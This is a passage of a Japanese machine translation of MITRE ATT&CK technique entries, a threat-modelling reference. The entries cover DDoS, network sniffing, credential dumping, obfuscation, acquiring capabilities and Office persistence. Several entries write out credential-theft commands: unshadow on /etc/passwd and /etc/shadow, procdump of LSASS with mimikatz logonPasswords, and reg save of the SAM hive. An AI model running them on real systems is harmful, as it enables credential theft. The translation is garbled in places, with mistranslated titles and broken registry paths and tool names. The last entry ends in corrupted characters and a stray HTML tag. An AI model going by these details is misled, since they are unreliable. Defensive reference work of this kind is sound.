ボットネットは、ネットワークやサービスに対してネットワークフラッディング攻撃を行う際によく使用されます。大規模なボットネットは、グローバルなインターネット上のシステムから大量のトラフィックを生成することができます。敵対者は、独自のボットネットインフラを構築して制御するためのリソースを持っている場合もあれば、既存のボットネットの時間を借りて攻撃を実施する場合もあります。分散型DoS(DDoS)の最悪のケースでは、非常に多くのシステムを使用してフラッドを生成するため、各システムが少量のトラフィックを送信するだけで、標的となるネットワークを飽和状態にするのに十分な量のトラフィックを生成することができます。このような状況では、DDoSトラフィックと正当なクライアントを区別することが非常に困難になります。ボットネットは、米国の大手銀行を標的とした2012年の一連の事件など、最も注目を集めたDDoSフラッディング攻撃に使用されています。(引用:USNYAG IranianBotnet 2016年3月)
333
T1498.002 ネットワーク・デニアル・オブ・サービスリフレクション・アンプション 敵対者は、大量のネットワークトラフィックを標的に反映させることで、サービス拒否を引き起こそうとする場合があります。このタイプのネットワークDoSでは、スプーフィングされたソースIPアドレスをホストし、それに応答するサードパーティのサーバを仲介します。この第三者のサーバーは、一般にリフレクタと呼ばれています。敵対者は、被害者の偽装されたアドレスを含むパケットをリフレクタに送信することにより、リフ レクション攻撃を実行する。Direct Network Floods と同様に、攻撃を実施するために複数のシステムが使用される場合や、ボ ットネットが使用される場合がある。同様に、ターゲットにトラフィックを集中させるために、1つまたは複数のリフレクターが使用される場合もあります。(引用:Cloudflare ReflectionDoS May 2017)

リフレクション攻撃は、トラフィックを増幅させるために、リクエストよりもレスポンスが大きいプロトコルを利用することが多く、一般的にReflection Amplification攻撃と呼ばれています。敵対者は、増幅器に送られるリクエストよりも数桁大きい攻撃トラフィックの量の増加を発生させることができるかもしれません。この増加の度合いは、問題となっているプロトコル、使用されている技術、攻撃量の増幅を実際に行う増幅サーバなど、多くの変数に依存します。Reflection Amplification Floodsを可能にした2つの著名なプロトコルは、DNS(Citation: Cloudflare DNSamplficationDoS)とNTP(Citation: Cloudflare NTPamplifciationDoS)ですが、他にもいくつかのプロトコルが野生で使用されていることが記録されています(Citation: Arbor AnnualDoSreport Jan 2018)特に、memcacheプロトコルは強力なプロトコルであることを示しており、増幅サイズはリクエストパケットの最大51,200倍に達しています(Citation: Cloudflare Memcrashed Feb 2018)。
334
T1046 ネットワークサービススキャン 敵対者は、リモートソフトウェアを悪用される可能性のあるサービスを含め、リモートホスト上で稼働しているサービスのリストを取得しようとする場合があります。

クラウド環境では、敵対者は、他のクラウド・ホスト上で実行されているサービスを発見しようとするかもしれません。また、クラウド環境がオンプレミス環境に接続されている場合、敵対者はクラウド以外のシステム上で稼働しているサービスも特定できる可能性があります。
335
T1135 ネットワーク共有の発見 敵対者は、コレクションの前兆として収集する情報源を特定したり、Lateral Movementの対象となる潜在的なシステムを特定する手段として、リモートシステムで共有されているフォルダやドライブを探すことがあります。ネットワークには共有ネットワークドライブやフォルダが存在することが多く、ユーザーはネットワーク上の様々なシステムのファイルディレクトリにアクセスすることができます。

Windowsネットワーク上のファイル共有はSMBプロトコルで行われます。(引用:Wikipedia Shared Resource) (引用:TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039)は、<code>net view \\\\remotesystem</code>コマンドを使用して、利用可能な共有ドライブをリモートシステムに問い合わせるために使用できます。また、<code>net share</code>を使って、ローカルシステムの共有ドライブを照会するのにも使用できます。
336
T1040 ネットワークスニッフィング 敵対者は、ネットワークトラフィックを盗聴して、ネットワーク上でやり取りされる認証情報など、環境に関する情報を取得することがあります。ネットワークスニッフィングとは、システムのネットワークインターフェースを使用して、有線または無線接続で送信される情報を監視またはキャプチャすることです。

この手法で取得されるデータには、特に暗号化されていない安全なプロトコルで送信されたユーザー認証情報が含まれる場合があります。また、[LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001)のようなネームサービス解決ポイズニングの技術は、トラフィックを敵対者にリダイレクトすることで、ウェブサイト、プロキシ、内部システムの認証情報を取得するために使用することができます。

ネットワークスニッフィングは、実行中のサービス、バージョン番号、その他のネットワーク特性(IPアドレス、ホスト名、VLAN IDなど)など、後続のLateral Movement(横移動)やDefense Evasion(防衛回避)活動に必要な設定の詳細を明らかにすることもできます。
337
T1095 非アプリケーション層プロトコル 敵対者は、ホストとC2サーバ間、またはネットワーク内の感染したホスト間の通信に、アプリケーション層以外のプロトコルを使用することがあります。具体的には、ICMP(Internet Control Message Protocol)などのネットワーク層のプロトコル、UDP(User Datagram Protocol)などのトランスポート層のプロトコル、SOCKS(Socket Secure)などのセッション層のプロトコル、SOL(Serial over LAN)などのリダイレクト/トンネル型のプロトコルなどが挙げられます。

ホスト間のICMP通信はその一例である。(引用:Cisco Synful Knock Evolution)
ICMPはインターネットプロトコルスイートの一部であるため、すべてのIP対応ホストに実装が義務付けられている。(引用:Microsoft ICMP)しかしながら、TCPやUDPなどの他のインターネットプロトコルに比べて監視されることが少なく、敵対者が通信を隠すために使用する可能性があるとされている。
338
T1571 非標準的なポート 敵対者は、通常は関連付けられていないプロトコルとポートパリングを使用して通信することがあります。例えば、従来のポート443ではなく、ポート8088(引用:Symantec Elfin 2019年3月)やポート587(引用:Fortinet Agent Tesla 2018年4月)を使ったHTTPSなどです。敵対者は、フィルタリングを回避したり、ネットワークデータの分析/解析を混乱させたりするために、プロトコルが使用する標準ポートに変更を加えることがあります。 339
T1003 OSのクレデンシャル・ダンピング 敵対者は、オペレーティングシステムやソフトウェアから、通常はハッシュまたはクリアテキストのパ スワードの形で、アカウントのログイン情報やクレデンシャルの情報を取得するために、クレデンシャルのダンピングを 試みます。クレデンシャルは、その後、「横移動」(https://attack.mitre.org/tactics/TA0008) を実行したり、制限された情報にアクセスするために使用されます。

関連するサブテクニックで言及されているツールのいくつかは、敵対者とプロのセキュリティ テスターの両方によって使用される可能性があります。その他のカスタムツールも存在すると思われます。
340
T1003.008 OSのクレデンシャルダンピング。/etc/passwdと/etc/shadow 敵対者は、オフラインでのパスワードクラッキングを可能にするために、<code>/etc/passwd</code>および<code>/etc/shadow</code>の内容をダンプしようとする場合があります。ほとんどの最新のLinuxオペレーティングシステムでは、<code>/etc/passwd</code>と<code>/etc/shadow</code>の組み合わせを使用して、パスワードハッシュを含むユーザーアカウント情報を<code>/etc/shadow</code>に保存します。デフォルトでは、<code>/etc/shadow</code>は、rootユーザーしか読むことができない。(Citation: Linux Password and Shadow File Formats)

Linuxユーティリティのunshadowを使用すると、John the Ripperなどのパスワードクラックユーティリティに適した形式で2つのファイルを結合することができます:(Citation: nixCraft - John the Ripper) <code># /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>
341
T1003.005 OSのクレデンシャル・ダンピング。キャッシュされたドメイン・クレデンシャル

Windows Vista以降では、ハッシュ形式はDCC2(Domain Cached Credentials version 2)ハッシュで、MS-Cache v2ハッシュとしても知られています(引用:PassLib mscache)デフォルトでキャッシュされる認証情報の数はシステムごとに異なり、変更することができます。このハッシュはパスザハッシュ形式の攻撃を許さず、代わりに平文のパスワードを回復するために[Password Cracking](https://attack.mitre.org/techniques/T1110/002)を必要とします。(引用: ired mscache)

SYSTEMにアクセスして、[Mimikatz](https://attack.mitre.org/software/S0002)、[Reg](https://attack.mitre.org/software/S0075)、secretsdump.pyなどのツール/ユーティリティを使用して、キャッシュされた資格情報を抽出することができます。

注意: Windows Vistaのキャッシュされた資格情報はPBKDF2を使用して導き出されます。(引用: PassLib mscache)
342
T1003.006 OSのクレデンシャル・ダンピングDCSync 敵対者は、Windowsドメインコントローラのアプリケーションプログラミングインタフェース(API)(引用:Microsoft DRSR Dec 2017)(引用:Microsoft GetNCCChanges)(引用:Samba DRSUAPI)(引用:Wine API samlib.dll)を悪用して、DCSyncと呼ばれる技術を使用してリモートドメインコントローラからのレプリケーションプロセスをシミュレートすることで、資格情報やその他の機密情報にアクセスしようとする可能性があります。

ドメインコントローラー上のAdministrators、Domain Admins、Enterprise Adminの各グループやコンピュータアカウントのメンバーは、DCSyncを実行してActive Directoryからパスワードデータ(引用:ADSecurity Mimikatz DCSync)を引き出すことができる。このデータには、KRBTGTやAdministratorsなどの潜在的に有用なアカウントの現在および過去のハッシュが含まれている可能性がある。これらのハッシュは、[Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)で使用する[Golden Ticket](https://attack.mitre.org/techniques/T1558/001)を作成したり、[Account Manipulation](https://attack.mitre.org/techniques/T1098)で述べたようにアカウントのパスワードを変更したりするために使用することができます。(引用:InsiderThreat ChangeNTLM 2017年7月)

DCSyncの機能は、[Mimikatz](https://attack.mitre.org/software/S0002)の「lsadump」モジュールに含まれています。(引用:GitHub Mimikatz lsadump Module) Lsadumpには、レガシーなレプリケーションプロトコル上でDCSyncを実行するNetSyncも含まれています。(引用:Microsoft NRPC 2017年12月)
343
T1003.004 OSのクレデンシャル・ダンピングLSAの秘密 ホストへのSYSTEMアクセス権を持つ敵は、サービスアカウントの認証情報など、さまざまな異なる認証情報を含む可能性のあるローカルセキュリティオーソリティ(LSA)シークレットへのアクセスを試みる可能性があります。(引用:Passcape LSA Secrets)(引用:Microsoft AD Admin Tier Model)(引用:Tilbury Windows Credentials) LSAシークレットは、レジストリの<code>HKEY_LOCAL_MACHINE\SECURITYPolicy\Secrets</code>に格納されています。LSAシークレットは、メモリからダンプすることもできます。(引用: ired Dumping LSA Secrets)

[Reg](https://attack.mitre.org/software/S0075)を使うと、レジストリから抽出することができます。[Mimikatz](https://attack.mitre.org/software/S0002)は、メモリから秘密を抽出するために使用できます。(引用: ired Dumping LSA Secrets)
344
T1003.001 OSのクレデンシャル・ダンピングLSASSメモリ 敵対者は、LSASS(Local Security Authority Subsystem Service)のプロセスメモリに格納されたクレデンシャル資料へのアクセスを試みることがあります。ユーザーがログオンすると、システムはさまざまなクレデンシャル資料を生成してLSASSのプロセスメモリに保存します。これらのクレデンシャル資料は、管理者ユーザーやSYSTEMが採取し、「代替認証資料の使用」(https://attack.mitre.org/techniques/T1550)を用いて「横移動」(https://attack.mitre.org/tactics/TA0008)を行うために使用することができます。

インメモリ技術と同様に、LSASSのプロセスメモリをターゲットホストからダンプし、ローカルシステムで分析することができます。

例えば、ターゲットホストではprocdumpを使用します。

* <code>procdump -ma lsass.exe lsass_dump</code>

ローカルでは、mimikatzを次のようにして実行できます。

* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>


Windows のセキュリティサポートプロバイダ (SSP) の DLL は、システム起動時に LSSAS プロセスにロードされます。LSA にロードされると、SSP DLL は、ログオンしているユーザーのドメインパスワードやスマートカードの PIN など、Windows に保存されている暗号化されたパスワードや平文のパスワードにアクセスできるようになります。SSPの設定は、<code>HKLM\SYSTEM\CurrentControlSet\Lsa\Security Packages</code>および<code>HKLM%%CurrentControlSet\Lsa\OSConfig\Security Packages</code>という2つのレジストリキーに保存されます。敵対者は、これらのレジストリキーを変更して新しいSSPを追加し、次回のシステム起動時またはWindows API関数のAddSecurityPackageが呼び出されたときにロードされます。(引用:Graeber 2014)

以下のSSPは、資格情報へのアクセスに使用することができます。

* Msv: インタラクティブログオン、バッチログオン、およびサービスログオンは、MSV認証パッケージを介して行われます。
* Wdigest:ダイジェスト認証プロトコルは、Hypertext Transfer Protocol(HTTP)およびSimple Authentication Security Layer(SASL)の交換に使用するために設計されている。(引用:TechNet Blogs Credential Protection)
* Kerberos。
* CredSSP: リモートデスクトップサービスにSSOとネットワークレベルの認証を提供する。(引用: TechNet Blogs Credential Protection)
345
T1003.003 OSのクレデンシャル・ダンピングNTDS 敵対者は、認証情報を盗むだけでなく、デバイス、ユーザー、アクセス権などのドメインメンバーに関する他の情報を取得するために、Active Directoryドメインデータベースにアクセスしたり、そのコピーを作成しようとすることがあります。デフォルトでは、NTDSファイル(NTDS.dit)は、ドメインコントローラの<code>%SystemRoot%\NTDS\Ntds.dit</code>にあります。(引用:Wikipedia Active Directory)

攻撃者は、アクティブなドメインコントローラ上のNTDSファイルを探すことに加えて、同じまたは類似した情報が含まれているバックアップを探すことがあります。(引用: Metcalf 2015)

NTDSファイルやActive Directory全体のハッシュの内容を列挙するには、以下のツールやテクニックを使用することができます。

* Volume Shadow Copy
* secretsdump.py
* Windows内蔵のツールntdsutil.exeの使用
* Invoke-NinjaCopy
346
T1003.007 OSのクレデンシャル・ダンピングプロセスファイルシステム 敵対者は、Procファイルシステムや<code>/proc</code>に格納されている情報から認証情報を収集することがあります。LinuxのProcファイルシステムには、実行中のオペレーティングシステムの状態に関する多くの情報が含まれています。root権限で実行されているプロセスは、この機能を使って、他の実行中のプログラムのライブメモリをかき集めることができます。

この機能は、Mimikatzにヒントを得て開発されたオープンソースツールMimiPenguin(引用:MimiPenguin GitHub May 2017)に実装されています。このツールは、プロセスメモリをダンプした後、Gnome Keyring、sshd、Apacheなどの所定のアプリケーションがどのようにメモリを使用してそのような認証成果物を保存しているか、テキスト文字列や正規表現パターンを探してパスワードやハッシュを採取します。
347
T1003.002 OSのクレデンシャル・ダンピングセキュリティアカウントマネージャー 敵対者は、インメモリ技術またはSAMデータベースが保存されているWindowsレジストリを使用して、Security Account Manager(SAM)データベースからクレデンシャル情報を抽出しようとする場合があります。SAMは、ホストのローカルアカウントを含むデータベースファイルで、通常は<code>net user</code>コマンドで検出されます。SAM データベースを列挙するには、SYSTEM レベルのアクセスが必要です。

いくつかのツールを使用して、インメモリ技術によって SAM ファイルを取得することができます。

* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py

あるいは、Reg:

* <code>reg save HKLM\sam sam</code>
* <code>reg save HKLM\system</code>

Creddump7 を使って SAM データベースをローカルに処理し、ハッシュを取得することもできます。(Citation: GitHub Creddump7)

Notes:
* RID 500アカウントは、ローカルのビルトイン管理者です。
* RID 501は、ゲストアカウントです。
* ユーザーアカウントは、RID 1,000+で始まります。
348
T1027 難読化されたファイルや情報 敵対者は、実行ファイルやファイルの内容をシステム上や転送中に暗号化、符号化、その他の方法で難読化することで、発見や分析を困難にしようとすることがあります。これは、防御を回避するために、異なるプラットフォームやネットワーク上で使用される一般的な動作です。

ペイロードは、検出を回避するために、圧縮、アーカイブ、または暗号化されることがあります。このようなペイロードは、初期アクセス時またはその後に、検知を軽減するために使用されることがあります。ユーザーによる実行](https://attack.mitre.org/techniques/T1204)のために、ファイルや情報を開いたり、[難読化/復号化](https://attack.mitre.org/techniques/T1140)したりするために、ユーザーの操作が必要になることがあります。また、敵対者が提供したパスワード保護された圧縮/暗号化ファイルを開くために、ユーザーにパスワードの入力を要求する場合もあります。(引用:Volexity PowerDuke 2016年11月) 敵対者は、JavaScriptなどの圧縮・アーカイブされたスクリプトを使用することもあります。

ファイルの一部を暗号化して、防御者の発見に役立つ平文の文字列を隠すこともできます。(引用:Linux/Cdorked.A We Live Security Analysis) また、ペイロードは、一見すると無害なファイルに分割され、再構築したときに初めて悪意のある機能が現れることもあります。(Citation: Carbon Black Obfuscation Sept 2016)

敵対者は、ペイロードから実行されるコマンドや、[Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)を介して直接実行されるコマンドを難読化することもあります。環境変数、エイリアス、文字、およびその他のプラットフォーム/言語固有のセマンティクスは、シグネチャベースの検出やアプリケーション制御メカニズムを回避するために使用することができます。(引用:FireEye Obfuscation 2017年6月)(引用:FireEye Revoke-Obfuscation 2017年7月)(引用:PaloAlto EncodedCommand 2017年3月)
349
T1027.001 難読化されたファイルや情報バイナリパディング 敵対者は、バイナリのパディングを利用してジャンクデータを追加し、マルウェアのディスク上の表現を変更することがあります。

バイナリのパディングは、ファイルのチェックサムを効果的に変更し、ハッシュベースのブロックリストや静的なアンチウイルス・シグネチャを回避するためにも使用されます。(引用:ESET OceanLotus) 使用されるパディングは、一般的にジャンクデータを作成する機能によって生成され、最後に追加されたり、マルウェアのセクションに適用されたりします。(引用:Securelist Malware Tricks April 2017) ファイルサイズを大きくすると、大きなファイルをスキャンするように設計または設定されていない特定のツールや検出機能の効果が低下する可能性があります。また、分析のために収集される可能性も低くなる場合があります。VirusTotalなどの公開されているファイルスキャンサービスでは、アップロードされたファイルの分析対象となる最大サイズが制限されています。(引用:VirusTotal FAQ)
350
T1027.004 難読化されたファイルや情報。配信後にコンパイルする 敵対者は、ファイルをコンパイルされていないコードとして被害者に配信することで、ペイロードの発見や分析を困難にしようとする場合があります。テキストベースのソースコードファイルは、実行ファイルやバイナリを対象とした保護機能による分析や精査を回避することができます。これらのペイロードは、実行前にコンパイルする必要があります。一般的には、ccc.exeやGCC/MinGWなどのネイティブユーティリティーを介して実行されます。(Citation: ClearSky MuddyWater Nov 2018)

ソースコードのペイロードは、暗号化、エンコード、および/または、[Phishing](https://attack.mitre.org/techniques/T1566)として配信されるものなど、他のファイルに埋め込まれることもあります。また、ペイロードは、ネイティブOSでは認識できない、本質的に良心的なフォーマットで配信され(例:macOS/Linux上のEXE)、その後、バンドルされたコンパイラや実行フレームワークを用いて、適切な実行バイナリに(再)コンパイルされることもあります(引用:TrendMicro WindowsAppMac)
351
T1027.005 難読化されたファイルや情報。インジケータのツールからの削除 敵対者は、自分の悪意のあるツールが検出、隔離、またはその他の方法で抑制されたと信じている場合、ツールからインジケータを取り除くことがあります。敵対者は、インジケーターを削除し、ターゲットの防御システムや、同様のシステムを使用している可能性のある後続のターゲットに検出されなくなった更新バージョンを使用することで、ツールを修正することができます。

この好例は、マルウェアがファイルシグネチャで検出され、アンチウイルスソフトウェアによって隔離された場合です。ファイルシグネチャが原因でマルウェアが隔離されたと判断できる敵対者は、そのシグネチャを明示的に回避するようにファイルを修正して、マルウェアを再利用することができます。
352
T1027.002 難読化されたファイルや情報。ソフトウェアの梱包 敵対者は自分のコードを隠すために、ソフトウェアパッキングや仮想マシンのソフトウェア保護を行うことがあります。ソフトウェアパッキングとは、実行ファイルを圧縮または暗号化する方法です。実行ファイルをパッキングすると、ファイルのシグネチャが変更され、シグネチャベースの検知を回避しようとします。ほとんどの解凍技術は、実行ファイルのコードをメモリ上で解凍します。仮想マシン・ソフトウェア・プロテクションは、実行ファイルのオリジナル・コードを、特別な仮想マシンだけが実行できる特別なフォーマットに変換します。そして、このコードを実行するために仮想マシンが呼び出されます(引用:ESET FinFisher Jan 2018)

ソフトウェアのパッキングを行うために使用されるユーティリティをパッカーと呼びます。パッカーの例としては、MPRESSとUPXがあります。より包括的な既知のパッカーのリストがありますが(引用:Wikipedia Exe Compression)、敵対者は防御を回避するために、既知のパッカーと同じアーティファクトを残さない独自のパッカー技術を作成することがあります。
353
T1027.003 ファイルや情報を難読化すること。ステガノグラフィ 敵対者は、隠された情報の検出を防ぐためにステガノグラフィ技術を使用することがあります。

[Duqu](https://attack.mitre.org/software/S0038)は、ステガノグラフィを使用した初期のマルウェアの例です。これは、被害者のシステムから収集した情報を暗号化し、画像内に隠してからC2サーバーに画像を流出させました。(引用:Wikipedia Duqu)

2017年末までに、ある脅威グループが?<code>Invoke-PSImage</code>を使用して、[PowerShell](https://attack.mitre.org/techniques/T1059/001)コマンドを画像ファイル(.png)内に隠し、被害者のシステム上でコードを実行しました。このケースでは、[PowerShell](https://attack.mitre.org/techniques/T1059/001)コードが別の難読化されたスクリプトをダウンロードして、被害者のマシンから情報を収集し、それを敵に伝達していました。(引用:McAfee Malicious Doc Targets Pyeongchang Olympics)
354
T1588 能力の獲得 敵対者は、ターゲティング時に使用できる能力を購入または盗用することがある。敵対者は、自社で能力を開発するのではなく、能力を購入したり、自由にダウンロードしたり、盗んだりすることがあります。その活動には、マルウェア、ソフトウェア(ライセンスを含む)、エクスプロイト、証明書、および脆弱性に関連する情報の取得が含まれます。敵対者は、敵対者のライフサイクルの様々な段階において、自らの活動を支援するための能力を取得することがあります。

インターネットから無料のマルウェア、ソフトウェア、エクスプロイトをダウンロードすることに加えて、敵対者はこれらの能力を第三者機関から購入することもあります。第三者機関には、マルウェアやエクスプロイトを専門とするテクノロジー企業、犯罪マーケットプレイス、または個人が含まれます。(引用:NationsBuying)(引用:PegasusCitizenLab)

敵対者は能力を購入するだけでなく、第三者機関(他の敵対者を含む)から能力を盗むこともあります。これには、ソフトウェア・ライセンス、マルウェア、SSL/TLSおよびコードサイニング証明書の盗用、脆弱性やエクスプロイトの非公開データベースの襲撃などが含まれます(引用:DiginotarCompromise)
355
T1588.003 機能を取得する。コードサイニング証明書 敵対者は、ターゲティングの際に使用できるコードサイニング証明書を購入または盗用することがあります。コード・サイニングとは、実行ファイルやスクリプトにデジタル署名することで、ソフトウェアの作者を確認し、コードが改ざんされたり破損したりしていないことを保証するプロセスです。コード・サイニングは、プログラムの開発者からの信頼性と、プログラムが改ざんされていないことを保証するものである。(引用:Wikipedia コード・サイニング)ユーザーやセキュリティ・ツールは、証明書の発行者や作者が誰であるかを知らなくても、署名されたコードを署名されていないコードよりも信頼することができる。

[コード・サイニング](https://attack.mitre.org/techniques/T1553/002)に先立ち、敵対者は作戦に使用するためにコード・サイニング証明書を購入または盗用することができる。コード サイニング証明書の購入は、フロント組織を利用したり、過去に侵害されたエンティティから盗んだ情報を利用して、敵対者がそのエンティ ティとして証明書プロバイダに対して認証を行うことができます。また、敵対者は、侵害された第三者から直接コードサイニング資料を盗むこともあります。
356
T1588.004 機能を取得する。デジタル証明書 敵対者は、SSL/TLS 証明書を購入または盗用して、標的化の際に使用することがあります。SSL/TLS 証明書は、信頼性を高めるために設計されています。証明書には、鍵に関する情報、証明書の所有者の身元に関する情報、証明書の内容が正しいことを確認したエンティティのデジタル署名が含まれています。

敵対者は、SSL/TLS 証明書を購入または盗用して、C2 トラフィックの暗号化などの活動を行うことがあります(例:[Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002)と[Web Protocols](https://attack.mitre.org/techniques/T1071/001))、あるいは、その証明書が信頼されているか、あるいは信頼のルートに追加されている場合(すなわち[Install Root Certificate](https://attack.mitre.org/techniques/T1553/004))、[Man-in-the-Middle](https://attack.mitre.org/techniques/T1557)を可能にすることさえあります。電子証明書の購入は、フロント組織を利用したり、過去に侵害されたエンティティから盗んだ情報を利用して、敵対者がそのエンティティとして証明書プロバイダに対して認証を行うことができます。また、敵対者は、認証局を含む危殆化した第三者から直接証明書の資料を盗むこともあります。(引用:DiginotarCompromise) 敵対者は、後にSSL/TLS証明書を購入するドメインを登録または乗っ取ることがあります。

ドメイン検証証明書など、敵対者がSSL/TLS証明書を無料で取得できる認証局が存在します。(引用:Let's Encrypt FAQ)

電子証明書を取得した後、敵対者は、その証明書を自分の管理下にあるインフラにインストールすることがあります([Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)を参照)。
357
T1588.005 Obtain Capabilities:Exploits 敵対者は、ターゲティングの際に使用できるエクスプロイトを購入、盗用、ダウンロードすることがあります。エクスプロイトとは、バグや脆弱性を利用して、コンピュータのハードウェアやソフトウェアに意図しない、あるいは予期しない動作をさせることです。敵対者は、独自のエクスプロイトを開発するのではなく、オンラインでエクスプロイトを見つけて修正したり、エクスプロイトベンダーから購入したりすることがある。(引用:エクスプロイトデータベース)(引用:TempertonDarkHotel)(引用:NationsBuying)

敵対者は、インターネットから無料のエクスプロイトをダウンロードするだけでなく、第三者機関からエクスプロイトを購入することもある。第三者機関には、エクスプロイトの開発を専門とするテクノロジー企業、犯罪マーケットプレイス(エクスプロイトキットを含む)、または個人が含まれます。(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) 敵対者は、エクスプロイトの購入に加えて、第三者機関(他の敵対者を含む)からエクスプロイトを盗み、再利用することがあります。(Citation: TempertonDarkHotel)

敵対者は、エクスプロイト提供者のフォーラムを監視して、既存のエクスプロイトや新たに発見されたエクスプロイトの状況を把握することがあります。通常、エクスプロイトが発見されてから公開されるまでには遅延がある。

敵対者は、敵対者のライフサイクルの様々なフェーズでエクスプロイトを使用することができます(すなわち、[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)、[Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203)、[Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)、[Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)、[Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)、[Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210)、[Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)などがあります。)
358
T1588.001 機能を獲得する。マルウェア 敵対者は、標的化の際に使用できるマルウェアを購入、盗用、またはダウンロードすることがあります。悪意のあるソフトウェアには、ペイロード、ドロッパー、侵害後のツール、バックドア、パッカー、C2プロトコルなどがあります。敵対者は、リモートマシンの制御を維持したり、防御を回避したり、侵害後の行動を実行したりするための手段を得るなど、作戦を支援するためにマルウェアを入手することがあります。

インターネットから無料のマルウェアをダウンロードすることに加えて、敵対者は第三者機関からこれらの機能を購入することもあります。第三者機関には、マルウェア開発を専門とするテクノロジー企業、犯罪者向けマーケットプレイス(MaaS(Malware-as-a-Service)を含む)、または個人が含まれます。敵対者は、マルウェアを購入するだけでなく、第三者機関(他の敵対者を含む)からマルウェアを盗み、再利用することもあります。
359
T1588.002 キャパシティを得る。ツール 敵対者は、ターゲティングに使用できるソフトウェアツールを購入、盗用、またはダウンロードすることがあります。ツールには、オープンソースとクローズドソース、無料と商用があります。ツールは、敵対者が悪意のある目的で使用することができますが、(マルウェアとは異なり)そのような目的で使用されることを意図していません(例:[PsExec](https://attack.mitre.org/software/S0029))。ツールの取得には、[Cobalt Strike](https://attack.mitre.org/software/S0154)のようなレッドチームツールを含め、商用ソフトウェアのライセンスの取得が含まれる場合があります。商用ソフトウェアは、購入、ライセンス(またはソフトウェアのライセンス付きコピー)の盗用、体験版のクラッキングなどによって入手することができます(引用:Recorded Future Beacon 2019)

敵対者は、妥協後の行動の実行をサポートするためなど、自分の作戦を支援するためのツールを入手することがあります。敵対者は、ソフトウェアを自由にダウンロードまたは購入するだけでなく、第三者機関(他の敵対者を含む)からソフトウェアおよび/またはソフトウェアライセンスを盗むことがあります。
360
T1588.006 キャプテン・ケイパビリティー脆弱性 敵対者は、ターゲティングの際に利用できる脆弱性に関する情報を入手することがあります。脆弱性とは、コンピュータのハードウェアやソフトウェアの弱点のことで、敵対者がそれを悪用して、意図しない、あるいは予期しない動作を引き起こす可能性があります。敵対者は、公開されているデータベースを検索したり、閉鎖されている脆弱性データベースにアクセスしたりすることで、脆弱性情報を見つけることができます。(引用:National Vulnerability Database)

敵対者は、既存の脆弱性や新たに発見された脆弱性の状況を把握するために、脆弱性の公開情報やデータベースを監視することがあります。脆弱性が発見されてから公開されるまでには、通常、遅れが生じます。敵対者は、脆弱性の研究を行っていることが知られている企業(商用ベンダーを含む)のシステムを標的にすることがあります。脆弱性を知った敵対者は、既存のエクスプロイトを探したり(例:[Exploits](https://attack.mitre.org/techniques/T1588/005))、自分で開発しようとしたり(例:[Exploits](https://attack.mitre.org/techniques/T1587/004))することがあります。
361
T1137 オフィスアプリケーションの起動 敵対者は、Microsoft Officeベースのアプリケーションを利用して、スタートアップ間の永続性を確保することがあります。Microsoft Officeは、企業ネットワーク内のWindowsベースのオペレーティングシステムでは、かなり一般的なアプリケーションスイートです。Officeベースのアプリケーションの起動時に、Officeで使用できる複数のメカニズムがある。これには、Officeテンプレートマクロやアドインの使用が含まれる。

Outlookでは、Outlookルール、フォーム、ホームページなど、永続性を得るために悪用できるさまざまな機能が発見されている。(引用:SensePost Ruler GitHub) これらの永続性メカニズムは、Outlook内で動作することも、Office 365で使用することもできる。(引用:TechNet O365 Outlook Rules)
362
T1137.006 Officeアプリケーションの起動。アドイン 侵入者は、Microsoft Officeのアドインを悪用して、侵入したシステムでのパーシステンスを取得することがあります。Officeアドインは、Officeプログラムに機能を追加するために使用できます。(引用: Microsoft Office Add-ins) Word/Excelアドインライブラリ(WLL/XLL)、VBAアドイン、Office Component Object Model(COM)アドイン、オートメーションアドイン、VBAエディタ(VBE)、Visual Studio Tools for Office(VSTO)アドイン、Outlookアドインなど、さまざまなOffice製品で使用できるアドインの種類があります。(引用:MRWLabs Office Persistence Add-ins)(引用:FireEye Mail CDS 2018)

アドインは、Officeアプリケーションの起動時にコードを実行するように設定できるため、パーシステンスを取得するために使用することができます。
363
T1137.001 Officeアプリケーションの起動。Officeテンプレートのマクロ 侵入者は、Microsoft Officeのテンプレートを悪用して、侵入したシステムのパーシステンスを取得することがあります。Microsoft Office には、一般的な Office アプリケーションの一部であり、スタイルをカスタマイズするために使用されるテンプレートが含まれています。アプリケーション内の基本テンプレートは、アプリケーションの起動時に毎回使用されます。(引用:Microsoft Change Normal Template)

Office Visual Basic for Applications(VBA)マクロ(引用:MSDN VBA in Office)をベーステンプレートに挿入し、それぞれのOfficeアプリケーションの起動時にコードを実行することで、パーシステンスを得るために使用することができます。WordとExcelの両方の例が発見され、公開されています。デフォルトでは、WordにはNormal.dotmというテンプレートが作成されており、悪意のあるマクロを含むように変更することができます。Excelでは、デフォルトではテンプレートファイルは作成されませんが、自動的に読み込まれるテンプレートを追加することができます。(引用:enigma0x3 normal.dotm)(引用:Hexacorn Office Template Macros) また、共有テンプレートを保存し、遠隔地から引き出すこともできます。(引用:GlobalDotName 2019年6月号)

Word Normal.dotm location:<br>
<code>C:\Users\&lt;username&gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm</code>

Excel Personal.xlsb location:<br>
<code>C:˶‾᷄д‾᷅˵<br> <img src="/FileUpload/Features/2/Photo/2.jpg" align="left" />

